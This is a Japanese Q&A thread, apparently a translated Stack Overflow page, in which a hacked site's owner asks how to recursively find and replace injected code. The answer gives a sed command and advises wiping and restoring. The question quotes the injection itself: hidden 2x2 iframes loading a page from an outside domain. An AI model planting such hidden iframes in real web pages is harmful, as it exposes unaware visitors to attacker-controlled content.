php - コード インジェクションは、Linux での検索と置換に役立ちます

Question

私のウェブサイトがハッキングされ、このようなコードの一部が挿入されました

<i>
    <iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe>
</i>

Linuxでこのコードを検索してこれに置き換える方法はありますか? 再帰的に

Answer 1

すべてのファイルを「検索」し、それらのファイルを検索して置換するには：

find ./ -type f | xargs sed -i 's/string1/string2/g'

Joakimがコメントで述べたように、侵害されたサーバーを扱っているときはいつでも、完全なワイプ<>復元を実行するのが最も安全です。復元する前に、エクスプロイトを確認してください。すべてのWebアプリが最新バージョンであることを確認してください。